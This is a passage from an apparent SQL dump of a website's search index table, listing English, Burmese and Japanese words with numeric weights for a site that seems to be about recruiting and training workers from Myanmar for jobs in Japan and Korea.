('nomenclature', 0.30103),
('nonadministration', 0.124939),
('none', 0.0375075),
('nonerror', 0.124939),
('normal', 0.0457575),
('normally', 0.0457575),
('not', 0.00236743),
('note', 0.01524),
('notfound', 0.0182128),
('notify', 0.0347621),
('notifying', 0.124939),
('now', 0.00837198),
('number', 0.00620198),
('nursing', 0.00582975),
('nway', 0.0413927),
('nwe', 0.0413927),
('nyein', 0.0177288),
('nyunt', 0.30103),
('obtained', 0.30103),
('occur', 0.00717858),
('off', 0.176091),
('offer', 0.176091),
('offers', 0.30103),
('office', 0.0458695),
('often', 0.0669468),
('old', 0.116579),
('once', 0.0282629),
('one', 0.00308178),
('onetimeloginurl', 0.124939),
('onjob', 0.00782534),
('online', 0.00182604),
('only', 0.00570225),
('open', 0.30103),
('opened', 0.190715),
('opening', 0.192794),
('operating', 0.30103),
('operation', 0.0476068),
('operations', 0.00150189),
('operationswe', 0.30103),
('opportunities', 0.0329445),
('opportunity', 0.0126903),
('option', 0.125687),
('optionally', 0.00469847),
('options', 0.0033771),
('order', 0.00284821),
('organization', 0.176091),
('organize', 0.124939),
('organizes', 0.124939),
('other', 0.00181649),
('our', 0.00313452),
('out', 0.0194938),
('outdoor', 0.30103),
('output', 0.0158343),
('outside', 0.0177346),
('over', 0.00730673),
('overall', 0.0706853),
('overseas', 0.0797384),
('overtime', 0.0457575),
('overview', 0.000397516),
('own', 0.00899522),
('page', 0.000545024),
('pager', 0.0292566),
('pages', 0.000867119),
('paginate', 0.13201),
('paid', 0.30103),
('paing', 0.00582954),
('palu', 0.00742402),
('pann', 0.00729924),
('pansodan', 0.176091),
('parents', 0.176091),
('part', 0.0193052),
('participating', 0.30103),
('particular', 0.00762278),
('partner', 0.30103),
('partnering', 0.30103),
('partnership', 0.30103),
('pass', 0.0823973),
('passed', 0.00539503),
('passing', 0.00285003),
('passport', 0.176091),
('passports', 0.00768683),
('passsing', 0.30103),
('password', 0.0202034),
('past', 0.0257099),
('pathlanguagecenter', 0.0211893),
('patterns', 0.0347621),
('paul', 0.30103),
('pay', 0.0972078),
('paying', 0.0791812),
('pending', 0.124939),
('people', 0.00224917),
('per', 0.0107496),
('perfect', 0.30103),
('perform', 0.0234811),
('performance', 0.00194246),
('performing', 0.0474681),
('permission', 0.00184321),
('permissions', 0.00161913),
('permit', 0.124807),
('permits', 0.30103),
('person', 0.0137883),
('personal', 0.30103),
('peson', 0.00796893),
('phd', 0.30103),
('phone', 0.115543),
('photo', 0.00768683),
('php', 0.0102192),
('phray', 0.00717858),
('phyo', 0.00226786),
('phyu', 0.00369623),
('pipeline', 0.30103),
('place', 0.00381278),
('placing', 0.30103),
('please', 0.102318),
('points', 0.09691),
('polish', 0.30103),
('pone', 0.30103),
('popup', 0.124939),
('porter', 0.0131604),
('position', 0.00653087),
('positions', 0.00768683),
('positive', 0.30103),
('possibilities', 0.189524),
('possibility', 0.124939),
('possible', 0.0327657),
('post', 0.0669468),
('posts', 0.0457575),
('potential', 0.124939),
('power', 0.176091),
('practical', 0.0511525),
('practice', 0.176091),
('practices', 0.245363),
('praised', 0.30103),
('pratical', 0.00125338),
('pre', 0.30103),
('precise', 0.30103),
('prefecture', 0.176091),
('prefer', 0.124939),
('preindex', 0.124939),
('preparation', 0.30103),
('preparing', 0.176091),
('pretend', 0.30103),
('pretenseour', 0.30103),
('preview', 0.0110868),
('previous', 0.0669468),
('previously', 0.0347621),
('price', 0.30103),
('pricing', 0.09691),
('printing', 0.0511525),
('priority', 0.176091),
('private', 0.0732163),
('probably', 0.124939),
('problem', 0.0321847),
('problems', 0.0102251),
('process', 0.00697793),
('produce', 0.194794),
('production', 0.0691563),
('products', 0.30103),
('professional', 0.0147287),
('professionals', 0.0518079),
('proficiency', 0.183954),
('profile', 0.00934003),
('profiles', 0.0280287),
('progress', 0.0157534),
('project', 0.103826),
('projects', 0.0614609),
('protocols', 0.30103),
('proud', 0.176091),
('provide', 0.00243506),
('provided', 0.00302221),
('provides', 0.00510913),
('providing', 0.0543376),
('public', 0.30103),
('published', 0.0105074),
('publishing', 0.147826),
('pull', 0.137794),
('purchase', 0.30103),
('purpose', 0.00590886),
('put', 0.0118992),
('pyae', 0.00211336),
('pyi', 0.0548355),
('qualification', 0.0466885),
('qualifications', 0.176091),
('qualified', 0.30103),
('quality', 0.30103),
('queries', 0.00446695),
('question', 0.0830243),
('questions', 0.214561),
('quick', 0.00257742),
('quickly', 0.0579919),
('quitting', 0.176091),
('race', 0.30103),
('ranging', 0.30103),
('rather', 0.124939),
('ray', 0.30103),
('rcc', 0.290751),
('reach', 0.30103),
('reading', 0.30103),
('ready', 0.30103),
('rearrange', 0.0280287),
('reasons', 0.0669468),
('receive', 0.0457575),
('recent', 0.0280287),
('recipe', 0.0457575),
('recipes', 0.0457575),
('record', 0.176091),
('recruitment', 0.0725447),
('red', 0.124939),
('reduce', 0.0579919),
('reference', 0.00168851),
('refine', 0.176091),
('regardless', 0.30103),
('region', 0.00268979),
('regional', 0.0347621),
('regions', 0.179244),
('register', 0.00607415),
('registered', 0.0457575),
('registration', 0.139796),
('regular', 0.0423925),
('regulated', 0.179506),
('reindex', 0.0366713),
('related', 0.00203157),
('relationships', 0.0354639),
('releases', 0.0669468),
('relevant', 0.30103),
('reliable', 0.30103),
('religion', 0.30103),
('religious', 0.30103),
('remaining', 0.30103),
('remember', 0.30103),
('remove', 0.0350571),
('renders', 0.124939),
('renowned', 0.30103),
('repair', 0.178078),
('repeat', 0.0243534),
('replace', 0.30103),
('replacement', 0.0280287),
('report', 0.0109954),
('reports', 0.00302821),
('request', 0.0457575),
('requests', 0.30103),
('require', 0.0478203),
('required', 0.00859116),
('requirement', 0.30103),
('requires', 0.0261131),
('reset', 0.0669468),
('residential', 0.30103),
('resource', 0.30103),
('resources', 0.000286035),
('respect', 0.09691),
('respective', 0.30103),
('respond', 0.0457575),
('response', 0.0234811),
('responses', 0.00300551),
('responsible', 0.30103),
('restaurant', 0.00267259),
('restaurants', 0.30103),
('restaurantsthe', 0.30103),
('restrictive', 0.124939),
('resturtant', 0.00296448),
('result', 0.0042847),
('results', 0.0170224),
('return', 0.0237299),
('returned', 0.0113601),
('review', 0.0669468),
('rice', 0.30103),
('rich', 0.30103),
('richard', 0.00717858),
('rid', 0.30103),
('right', 0.0142616),
('righttoleft', 0.0158412),
('rise', 0.30103),
('road', 0.0791812),
('roads', 0.30103),
('rokushiken', 0.30103),
('role', 0.00151068),
('roleplaying', 0.176091),
('roles', 0.00456546),
('room201', 0.176091),
('row', 0.0137883),
('rss', 0.124939),
('rules', 0.178298),
('run', 0.00441098),
('running', 0.00180776),
('runs', 0.0348194),
('runtime', 0.124939),
('safe', 0.30103),
('sagaing', 0.088793),
('salary', 0.09691),
('sale', 0.0695415),
('sales', 0.176091),
('saloon', 0.30103),
('same', 0.0114066),
('san', 0.0299632),
('sandar', 0.00729924),
('sapal', 0.00663058),
('sat', 0.00796893),
('satisfaction', 0.30103),
('save', 0.000631826),
('saved', 0.0243047),
('saving', 0.30103),
('sayah', 0.00782534),
('sayar', 0.30103),
('saying', 0.0669468),
('scan', 0.0669468),
('scenarios', 0.30103),
('schedule', 0.186613),
('school', 0.0530308),
('schools', 0.100013),
('scrambled', 0.0511525),
('screen', 0.0125891),
('scroll', 0.0791812),
('sdf', 0.176091),
('sdfs', 0.30103),
('sdfsdf', 0.30103),
('sdfsdfs', 0.30103),
('seamless', 0.30103),
('search', 0.000345429),
('searched', 0.30103),
('searches', 0.0707911),
('searching', 0.0163379),
('seasonal', 0.30103),
('seasoned', 0.30103),
('second', 0.0511525),
('section', 0.00715811),
('sections', 0.00634018),
('sector', 0.30103),
('sectors', 0.213891),
('secure', 0.09691),
('security', 0.00106137),
('see', 0.00138899),
('seeking', 0.30103),
('seize', 0.0142404),
('select', 0.0026406),
('selected', 0.006867),
('selector', 0.0347621),
('selling', 0.30103),
('semiprofessionals', 0.0669468),
('send', 0.195229),
('sends', 0.124939),
('seniors', 0.30103),
('sensei', 0.176091),
('sent', 0.0477863),
('september', 0.0134189),
('server', 0.0457575),
('service', 0.0377886),
('services', 0.0105756),
('sessions', 0.30103),
('set', 0.00208955),
('sets', 0.0280287),
('setting', 0.00183177),
('settings', 0.000427765),
('several', 0.0240092),
('severity', 0.0347621),
('sfdsdf', 0.30103),
('shan', 0.0413927),
('shar', 0.09691),
('shared', 0.0669468),
('sharpen', 0.30103),
('sheets', 0.0511525),
('shin', 0.0102198),
('shinkensen', 0.140288),
('shipyard', 0.00626121),
('shipyards', 0.00502523),
('shop', 0.30103),
('short', 0.0457575),
('shortcut', 0.00262728),
('shortcuts', 0.00294816),
('should', 0.00201239),
('show', 0.00590886),
('showing', 0.124939),
('shown', 0.00621716),
('shows', 0.0457575),
('shwe', 0.00493912),
('shwepyi', 0.30103),
('side', 0.01524),
('significance', 0.30103),
('similar', 0.0281768),
('simple', 0.0129775),
('since', 0.30103),
('sincere', 0.30103),
('singapore', 0.0113482),
('single', 0.00222146),
('sinmalai', 0.0147233),
('sinmalike', 0.0119436),
('site', 0.000212501),
('sites', 0.00998427),
('situated', 0.176091),
('situations', 0.124939),
('skill', 0.0072715),
('skilled', 0.0139262),
('skills', 0.069735),
('sleep', 0.30103),
('slider1', 0.0157943),
('slider2', 0.0157943),
('slogan', 0.0669468),
('small', 0.124939),
('smaller', 0.0263289),
('smartly', 0.30103),
('smooth', 0.30103),
('soe', 0.00174066),
('software', 0.00654004),
('solr', 0.0118992),
('solutions', 0.30103),
('some', 0.00445905),
('sone', 0.00363428),
('sons', 0.30103),
('soon', 0.09691),
('sort', 0.0234811),
('sorting', 0.0669468),
('sorts', 0.140873),
('soumatome', 0.30103),
('soung', 0.00717858),
('source', 0.09691),
('south', 0.0073059),
('spanfieldcontent', 0.0211893),
('sparepart', 0.245839),
('speak', 0.0579919),
('speakers', 0.30103),
('speaking', 0.00575233),
('special', 0.00653087),
('specific', 0.00692213),
('specify', 0.0669468),
('specifying', 0.0981841),
('speeches', 0.0579919),
('speed', 0.191392),
('sphinx', 0.012965),
('spot', 0.09691),
('square', 0.124939),
('staff', 0.154526),
('stand', 0.30103),
('standards', 0.100108),
('standed', 0.30103),
('star', 0.124939),
('stars', 0.00768683),
('start', 0.0222764),
('started', 0.013364),
('starting', 0.00696368),
('starts', 0.0377886),
('states', 0.176091),
('station', 0.30103),
('status', 0.0032457),
('stay', 0.30103),
('stemmer', 0.013214),
('stemming', 0.124939),
('step', 0.00783172),
('steps', 0.00011254),
('store', 0.0280287),
('storied', 0.234166),
('storyed', 0.30103),
('strange', 0.176091),
('strength', 0.30103),
('strictly', 0.0791812),
('string', 0.0234811),
('strings', 0.0280287),
('strives', 0.30103),
('striving', 0.30103),
('structure', 0.000981002),
('structured', 0.30103),
('student', 0.00560388),
('students', 0.00653087),
('studentsopportunities', 0.30103),
('studentswith', 0.30103),
('study', 0.30103),
('style', 0.00227977),
('subject', 0.30103),
('substituted', 0.124939),
('subterm', 0.124939),
('subtype', 0.00115133),
('subtypes', 0.0137931),
('success', 0.0820594),
('successful', 0.176091),
('successfully', 0.09691),
('such', 0.00361958),
('sufficient', 0.143059),
('summarizes', 0.124939),
('sun', 0.0234811),
('supervisors', 0.30103),
('support', 0.0191611),
('supportive', 0.30103),
('supports', 0.0791812),
('sure', 0.00922319),
('surrounded', 0.30103),
('surrounding', 0.30103),
('survived', 0.0511525),
('sushi', 0.00582954),
('swe', 0.09691),
('switch', 0.0466066),
('system', 0.00331491),
('systematic', 0.30103),
('tab', 0.0280287),
('table', 0.00903451),
('tables', 0.0669468),
('tablestyle', 0.124939),
('tagging', 0.124939),
('tags', 0.0125447),
('tai', 0.30103),
('tailored', 0.30103),
('take', 0.0225847),
('taking', 0.00553249),
('talent', 0.30103),
('talented', 0.30103),
('tango', 0.30103),
('task', 0.0205143),
('tasks', 0.00151974),
('taught', 0.30103),
('taung', 0.30103),
('taw', 0.30103),
('tax', 0.124939),
('taxes', 0.30103),
('taxonomy', 0.000918155),
('teach', 0.0822273),
('teacher', 0.09691),
('teachers', 0.09691),
('teaching', 0.01305),
('technical', 0.0701806),
('technically', 0.124939),
('technician', 0.0107239),
('technicians', 0.0263289),
('technologies', 0.10025),
('technology', 0.0511525),
('tell', 0.176091),
('tender', 0.30103),
('tenders', 0.30103),
('term', 0.0110574),
('terms', 0.00691894),
('test', 0.00614387),
('testament', 0.30103),
('tests', 0.30103),
('text', 0.000365946),
('textbook', 0.101291),
('thae', 0.00219896),
('thailand', 0.134043),
('than', 0.00334309),
('thandar', 0.00717858),
('thank', 0.124939),
('thant', 0.00419622),
('thari', 0.00768683),
('that', 0.000623615),
('thatoe', 0.00694886),
('thaw', 0.00348833),
('thazin', 0.0413927),
('the', 0.000063048),
('their', 0.00299639),
('them', 0.00645811),
('theme', 0.00095164),
('themes', 0.00204995),
('themselves', 0.09691),
('then', 0.0174925),
('there', 0.00290195),
('these', 0.00496492),
('thet', 0.00827295),
('they', 0.00514681),
('thida', 0.0511525),
('thidar', 0.09691),
('thing', 0.0347621),
('things', 0.00760963),
('thingyan', 0.00729924),
('thirdparty', 0.0669468),
('this', 0.00132485),
('thoroughly', 0.30103),
('those', 0.0053201),
('though', 0.176091),
('three', 0.0115819),
('thrilled', 0.30103),
('thrive', 0.30103),
('throttle', 0.0347621),
('through', 0.00415467),
('throughout', 0.081756),
('thu', 0.00118494),
('thura', 0.00357446),
('time', 0.00746381),
('timeout', 0.124939),
('times', 0.0718789),
('tin', 0.0669468),
('tip', 0.0669468),
('tips', 0.0347621),
('title', 0.0012468),
('tobeemployees', 0.202476),
('today', 0.131617),
('toe', 0.00768683),
('together', 0.182608),
('tokueti', 0.30103),
('tokutei', 0.0070049),
('tokyo', 0.0791812),
('tomatoes', 0.0457575),
('took', 0.0511525),
('toolbar', 0.00346124),
('top', 0.0301574),
('topic', 0.00416515),
('topics', 0.000973979),
('topik', 0.176091),
('topj', 0.136881),
('total', 0.30103),
('totally', 0.124939),
('tour', 0.00624895),
('tourism', 0.30103),
('tours', 0.00282929),
('towards', 0.30103),
('towns', 0.30103),
('township', 0.189524),
('trade', 0.30103),
('trading', 0.00119255),
('tradition', 0.176091),
('traditional', 0.30103),
('traditions', 0.30103),
('train', 0.30103),
('trainees', 0.00717858),
('training', 0.00279505),
('traits', 0.30103),
('transferred', 0.09691),
('translatable', 0.0109954),
('translate', 0.00717858),
('translation', 0.0012047),
('translations', 0.00360412),
('transport', 0.0457575),
('transportation', 0.0791812),
('travel', 0.30103),
('traveling', 0.30103),
('treat', 0.0791812),
('treatment', 0.00567713),
('truck', 0.245312),
('trucks', 0.30103),
('truly', 0.30103),
('trust', 0.124939),
('trusted', 0.0321847),
('trustful', 0.30103),
('try', 0.30103),
('trying', 0.0579919),
('tsp', 0.176091),
('tue', 0.00415596),
('tuesday', 0.187262),
('tun', 0.176091),
('tuned', 0.30103),
('twice', 0.124939),
('two', 0.00453107),
('type', 0.000388189),
('types', 0.00106574),
('ultimate', 0.30103),
('uncheck', 0.0202034),
('under', 0.00301365),
('undergo', 0.30103),
('understand', 0.0460594),
('understanding', 0.124939),
('unformatted', 0.0177288),
('uninstall', 0.00379985),
('uninstalled', 0.012965),
('uninstalling', 0.00197857),
('university', 0.09691),
('unlock', 0.30103),
('unparalleled', 0.30103),
('unpublishing', 0.148256),
('until', 0.0157943),
('unused', 0.00553249),
('unwavering', 0.09691),
('upcoming', 0.0321847),
('update', 0.00556859),
('updates', 0.00402315),
('upon', 0.128557),
('upper', 0.176091),
('urgently', 0.01524),
('url', 0.000929128),
('urls', 0.00222155),
('use', 0.0015601),
('used', 0.004803),
('user', 0.000232182),
('username', 0.0347621),
('users', 0.0013447),
('uses', 0.0457575),
('using', 0.000825537),
('usually', 0.09691),
('value', 0.00924211),
('valued', 0.30103),
('values', 0.00598152),
('variables', 0.00575233),
('various', 0.136131),
('vary', 0.0413927),
('vegetable', 0.30103),
('vegetables', 0.124939),
('vehicle', 0.30103),
('vehicles', 0.30103),
('venereal', 0.30103),
('venture', 0.30103),
('verification', 0.0669468),
('verified', 0.0669468),
('verify', 0.00678435),
('very', 0.060453),
('veteran', 0.30103),
('viber', 0.116263),
('vibrant', 0.30103),
('view', 0.000677774),
('viewing', 0.0263289),
('viewlanguagecenter', 0.0211893),
('views', 0.00143779),
('viewsfieldviewnode', 0.0211893),
('virus', 0.181613),
('visa', 0.00201475),
('visas', 0.124939),
('visawishing', 0.30103),
('vision', 0.00934003),
('visit', 0.0116112),
('visiting', 0.30103),
('visitors', 0.00275277),
('visits', 0.00717858),
('viza', 0.0147233),
('vocabularies', 0.0213938),
('vocabulary', 0.00346053),
('waei', 0.30103),
('wah', 0.00683942),
('wai', 0.00464491),
('wait', 0.0202034),
('waiting', 0.136466),
('walk', 0.0700917),
('walked', 0.13201),
('walking', 0.100836),
('want', 0.00114304),
('wanted', 0.00346053),
('wants', 0.01524),
('warning', 0.0347621),
('warnings', 0.124939),
('was', 0.0124687),
('water', 0.30103),
('way', 0.016096),
('ways', 0.0579919),
('wealth', 0.30103),
('web', 0.00138974),
('website', 0.00329833),
('wed', 0.00340625),
('wednesday', 0.187585),
('week', 0.30103),
('welcome', 0.0263289),
('weld', 0.30103),
('welder', 0.00768683),
('welders', 0.01524),
('welding', 0.00177709),
('well', 0.0188185),
('went', 0.0791812),
('were', 0.01557),
('what', 0.0000946104),
('when', 0.00210448),
('where', 0.00513964),
('whether', 0.0203253),
('which', 0.00153511),
('while', 0.00572062),
('white', 0.0347621),
('who', 0.000427411),
('whole', 0.124939),
('whose', 0.0347621),
('why', 0.0579919),
('will', 0.00131459),
('willing', 0.176091),
('win', 0.0239265),
('wish', 0.00925063),
('wishing', 0.0137883),
('with', 0.000659254),
('within', 0.124939),
('without', 0.0234811),
('witness', 0.176091),
('won', 0.30103),
('word', 0.0178051),
('words', 0.0465554),
('work', 0.00106801),
('workers', 0.00430954),
('workflow', 0.0150436),
('working', 0.00673338),
('workonly', 0.221843),
('workplace', 0.101392),
('workplaces', 0.124939),
('works', 0.0528469),
('world', 0.30103),
('worry', 0.30103),
('would', 0.00745073),
('written', 0.30103),
('wun', 0.0691104),
('wut', 0.0299632),
('wwwnewcomettradingagencycom', 0.0920875),
('xray', 0.30103),
('yamin', 0.0033027),
('yandanar', 0.30103),
('yangon', 0.0593825),
('yati', 0.00694886),
('yaw', 0.00706185),
('year', 0.0579919),
('years', 0.031061),
('yee', 0.00327771),
('yin', 0.00729924),
('you', 0.000438465),
('young', 0.0694167),
('your', 0.000323047),
('yourselves', 0.176091),
('youth', 0.176091),
('zar', 0.0413927),
('zaw', 0.00236673),
('zayya', 0.0573172),
('zeya', 0.0663882),
('zin', 0.00284784),
('zone', 0.0669468),
('ကနေ', 0.176091),
('ကိုရီးယားနိုင်ငံရှိ', 0.0147233),
('ကိုရီးယားမှ', 0.0147233),
('ကုန်ကျစရိတ်များ', 0.176091),
('ကျန်နိုင်ပါသည်', 0.176091),
('ကျန်းမာရေးအာမခံနှင့်', 0.176091),
('ကျွမ်းကျင်', 0.0157943),
('ဂဟေဆော်', 0.00755314),
('ဂဟေဆော်ပညာရှင်', 0.0157943),
('စစ်ဆေးနိုင်ဖို့', 0.0147233),
('စာမေးပွဲ', 0.0147233),
('စားသောက်စရိတ်', 0.176091),
('ဆက်သွယ်ရေး', 0.30103),
('ဆက်သွယ်ရေးဝန်ကြီးဌာနမှ', 0.0157943),
('ဆင်မလိုက်', 0.01524),
('ဆင်မလိုက်သင်္ဘောကျင်းမှ', 0.0147233),
('ဌာနမှ', 0.0147233),
('တစ်နေ့', 0.176091),
('တတ်ကျွမ်းနားလည်တဲ့', 0.176091),
('တာဝန်ထမ်းဆောင်နေတဲ့သူတွေ', 0.176091),
('တွေနဲ့', 0.176091),
('ထပ်ခွဲထားပါသေးတယ်', 0.176091),
('ဒါမှမဟုတ်', 0.176091),
('ဒုဝန်ကြီးမှ', 0.01524),
('ဒုဝန်ကြီးမှလာရောက်တွေ့ဆုံ', 0.0147233),
('နည်းပညာ', 0.176091),
('နည်းပညာပိုင်းဆိုင်ရာ', 0.176091),
('နယ်ပယ်တခုခုမှာ', 0.176091),
('နယ်ပယ်မှာ', 0.176091),
('နာရီနှင့်', 0.176091),
('နိုင်ငံခြား', 0.176091),
('နိုင်ငံသား', 0.176091),
('နဲ့', 0.0147233),
('နှုတ်ပြီးလျှင်', 0.176091),
('ပညာရှင်', 0.176091),
('ပညာရှင်တွေကို', 0.176091),
('ပညာရှင်ဗီဇာပါ', 0.176091),
('ပထမအသုတ်', 0.01524),
('ပထမအသုတ်ဂဟေဆော်သင်တန်းသားများအား', 0.0147233),
('ပိုင်းဆိုင်ရာ', 0.176091),
('ပို့ဆောင်ရေးနှင့်', 0.01524),
('ပို့ဆောင်ရေးနှင့်ဆက်သွယ်ရေးဝန်ကြီး', 0.0147233),
('ပေးတယ်လို့လည်း', 0.176091),
('ပေးတဲ့', 0.176091),
('ပြောကြား', 0.09691),
('ပြောကြားပေးပြီး', 0.124939),
('ပြောင်းလာရင်', 0.176091),
('ဖြစ်ပါတယ်တဲ့', 0.176091),
('ဗီဇာပါ', 0.0669468),
('ဗီဇာလည်း', 0.176091),
('များသောအားဖြင့်', 0.176091),
('မြန်မာငွေ', 0.176091),
('ရက်လောက်ဆင်း', 0.176091),
('ရရှိတဲ့', 0.0669468),
('ရရှိမည့်ငွေနှင့်', 0.176091),
('ရှင်းလင်း', 0.0147233),
('လာရောက်', 0.0147233),
('လာရောက်စစ်ဆေးစဉ်', 0.176091),
('လာရောက်စစ်ဆေးသည်', 0.30103),
('လာရောက်တွေ့ဆုံ', 0.124939),
('လိုအပ်သည်များကို', 0.0147233),
('လုပ်ကိုင်နေသူတွေ', 0.176091),
('လုပ်ကိုင်လိုသူများ', 0.0157943),
('လုပ်သက်', 0.176091),
('လုပ်သားတွေ', 0.176091),
('ဝန်ကြီးဌာနမှ', 0.30103),
('သင်တန်းကျောင်းအား', 0.124939),
('သင်တန်းကျောင်းအားလာရောက်စစ်ဆေးစဉ်', 0.0147233),
('သင်တန်းသားများကို', 0.0147233),
('သင်တန်းသားများအား', 0.01524),
('သင်္ဘောကျင်းကို', 0.0147233),
('သင်္ဘောကျင်းတွင်', 0.0157943),
('သင်္ဘောကျင်းမှ', 0.01524),
('သိန်း', 0.176091),
('သိရပါတယ်', 0.176091),
('သွားရောက်', 0.0157943),
('သွားရောက်နိုင်ဖို့', 0.0147233),
('အခြားနေထိုင်', 0.176091),
('အတွေ့ကြုံရှိ', 0.09691),
('အထူးစွမ်းရည်ဗီဇာပါ', 0.176091),
('အဖြစ်', 0.0157943),
('အမျိုးစား', 0.176091),
('အမြန်လာရောက်', 0.0147233),
('အမှတ်အပေါ်မူတည်ပြီး', 0.176091),
('အမှာစကားများ', 0.124939),
('အမှာစကားများပြောကြားပေးပြီး', 0.0147233),
('အလိုရှိသည်', 0.0157943),
('အလုပ်တွေရယ်', 0.176091),
('အဲမှာလည်း', 0.176091),
('၀င်ငွေခွန်', 0.176091),
('၃၆၂၀၂၃', 0.30103),
('၅နှစ်အထက်', 0.176091),
('၅၀အထက်လောက်', 0.176091),
('あたり', 0.30103),
('あなた', 0.0722477),
('ありが', 0.30103),
('ありま', 0.0299465),
('あるか', 0.30103),
('あるニ', 0.30103),
('ある従', 0.30103);
INSERT INTO `search_total` (`word`, `count`) VALUES
('ある必', 0.30103),
('ある方', 0.30103),
('ある潜', 0.30103),
('ある経', 0.30103),
('ある豊', 0.30103),
('あれば', 0.30103),
('いう意', 0.30103),
('いう明', 0.30103),
('いかな', 0.30103),
('いがご', 0.30103),
('いきま', 0.30103),
('いこと', 0.30103),
('いしま', 0.09691),
('いたし', 0.30103),
('いただ', 0.0686007),
('いた後', 0.176091),
('いった', 0.30103),
('いてお', 0.101628),
('いてく', 0.234077),
('いてさ', 0.30103),
('いての', 0.188306),
('いても', 0.231729),
('いてシ', 0.01524),
('いて日', 0.30103),
('いて説', 0.124939),
('いて道', 0.30103),
('いでし', 0.221396),
('いです', 0.30103),
('いとい', 0.30103),
('いに仕', 0.30103),
('いに期', 0.30103),
('いのは', 0.30103),
('いまし', 0.176091),
('います', 0.000378367),
('いよう', 0.219534),
('いると', 0.30103),
('いるサ', 0.30103),
('いる候', 0.30103),
('いる必', 0.30103),
('いれば', 0.30103),
('いをし', 0.30103),
('いトピ', 0.30103),
('いネッ', 0.30103),
('いミャ', 0.30103),
('い事が', 0.30103),
('い人た', 0.30103),
('い人の', 0.124939),
('い人を', 0.176091),
('い会社', 0.176091),
('い励ま', 0.30103),
('い合わ', 0.01524),
('い場合', 0.30103),
('い娘が', 0.09691),
('い学生', 0.30103),
('い息子', 0.30103),
('い方で', 0.09691),
('い方の', 0.30103),
('い方は', 0.124939),
('い機会', 0.176091),
('い生徒', 0.124939),
('い知識', 0.188306),
('い研修', 0.30103),
('い経験', 0.124939),
('い職を', 0.30103),
('い車を', 0.30103),
('うこそ', 0.0163904),
('うこと', 0.30103),
('うござ', 0.000387712),
('うな良', 0.30103),
('うにし', 0.30103),
('うに努', 0.30103),
('うに扱', 0.0848163),
('うに支', 0.30103),
('うに時', 0.30103),
('うまく', 0.30103),
('うよう', 0.30103),
('う上司', 0.0222764),
('う個人', 0.30103),
('う十分', 0.30103),
('う必要', 0.30103),
('う意欲', 0.30103),
('う明確', 0.30103),
('えした', 0.30103),
('えしま', 0.130678),
('えてい', 0.30103),
('えてお', 0.0263289),
('えてく', 0.216776),
('えに置', 0.30103),
('えまし', 0.30103),
('えられ', 0.0463138),
('えるそ', 0.30103),
('える場', 0.30103),
('える準', 0.30103),
('える韓', 0.30103),
('えを捨', 0.30103),
('おいて', 0.30103),
('おかげ', 0.30103),
('おくべ', 0.30103),
('おける', 0.228104),
('おめで', 0.000336535),
('および', 0.0129158),
('おりま', 0.0516609),
('お伝え', 0.100318),
('お問い', 0.01524),
('お客様', 0.30103),
('お手伝', 0.0791812),
('お楽し', 0.30103),
('お気軽', 0.30103),
('お知ら', 0.30103),
('お祈り', 0.176091),
('お見逃', 0.30103),
('かけた', 0.09691),
('かけて', 0.30103),
('かけの', 0.30103),
('かげで', 0.30103),
('かった', 0.30103),
('かなる', 0.30103),
('かなプ', 0.30103),
('かな伝', 0.30103),
('かのよ', 0.30103),
('からで', 0.30103),
('からの', 0.0547177),
('から午', 0.163815),
('から厨', 0.30103),
('から多', 0.30103),
('から差', 0.176091),
('から常', 0.30103),
('から感', 0.30103),
('から指', 0.30103),
('から日', 0.233918),
('から来', 0.30103),
('から直', 0.269507),
('から移', 0.192842),
('から許', 0.30103),
('かれる', 0.176091),
('か月以', 0.30103),
('か質問', 0.30103),
('があり', 0.035587),
('がある', 0.30103),
('があれ', 0.30103),
('がいま', 0.30103),
('がうま', 0.30103),
('がお手', 0.09691),
('がござ', 0.30103),
('がすべ', 0.30103),
('がそれ', 0.30103),
('ができ', 0.0586608),
('がとう', 0.30103),
('がない', 0.21928),
('がりを', 0.30103),
('が切実', 0.124939),
('が勉強', 0.30103),
('が参加', 0.00998422),
('が大い', 0.30103),
('が大切', 0.30103),
('が定め', 0.224176),
('が実施', 0.30103),
('が得ら', 0.124939),
('が必要', 0.0549789),
('が成功', 0.30103),
('が指導', 0.30103),
('が授与', 0.30103),
('が日本', 0.0595411),
('が最優', 0.30103),
('が本日', 0.30103),
('が残る', 0.176091),
('が自分', 0.30103),
('が規定', 0.30103),
('が評価', 0.30103),
('が説明', 0.124939),
('が遭遇', 0.30103),
('が重要', 0.30103),
('きこと', 0.176091),
('きしめ', 0.30103),
('きたい', 0.0360555),
('きちん', 0.197602),
('きです', 0.124939),
('きない', 0.291583),
('きな喜', 0.30103),
('きな職', 0.30103),
('きに覚', 0.0263289),
('きまし', 0.0600135),
('きます', 0.139931),
('きるか', 0.30103),
('きるこ', 0.188306),
('きるだ', 0.196298),
('きるよ', 0.30103),
('きる企', 0.30103),
('きる学', 0.30103),
('きれい', 0.30103),
('きをか', 0.09691),
('き専用', 0.30103),
('き成長', 0.30103),
('き換え', 0.30103),
('き溶接', 0.30103),
('き続き', 0.30103),
('き金額', 0.176091),
('ぎない', 0.30103),
('くいき', 0.30103),
('くこと', 0.30103),
('くご覧', 0.30103),
('くため', 0.0669468),
('くださ', 0.0142726),
('くとも', 0.176091),
('くのプ', 0.30103),
('くの賞', 0.30103),
('くべき', 0.30103),
('くよう', 0.30103),
('くれた', 0.30103),
('くフー', 0.124939),
('く受け', 0.30103),
('く就職', 0.30103),
('く必要', 0.210818),
('く思っ', 0.30103),
('く方に', 0.185627),
('く日本', 0.193692),
('く検索', 0.30103),
('く活躍', 0.30103),
('く素晴', 0.30103),
('く聞い', 0.30103),
('ぐ登録', 0.30103),
('けさせ', 0.30103),
('けたい', 0.0897903),
('けた扉', 0.30103),
('けてい', 0.30103),
('けてき', 0.30103),
('けてく', 0.09691),
('けです', 0.30103),
('けでな', 0.0872516),
('けで十', 0.30103),
('けない', 0.176091),
('けに手', 0.30103),
('けのビ', 0.188859),
('けの必', 0.30103),
('けまし', 0.30103),
('けます', 0.30103),
('けられ', 0.1479),
('けるこ', 0.0998679),
('けるた', 0.124939),
('けるよ', 0.30103),
('ける当', 0.30103),
('ける必', 0.228151),
('ける敬', 0.30103),
('ける機', 0.30103),
('ければ', 0.30103),
('けレス', 0.0222764),
('け取り', 0.30103),
('け早く', 0.30103),
('げます', 0.30103),
('ここに', 0.30103),
('こだわ', 0.30103),
('ことか', 0.30103),
('ことが', 0.0421203),
('ことだ', 0.30103),
('ことで', 0.30103),
('ことな', 0.30103),
('ことに', 0.0953561),
('ことは', 0.176091),
('ことま', 0.30103),
('ことを', 0.0723792),
('こにい', 0.30103),
('このア', 0.30103),
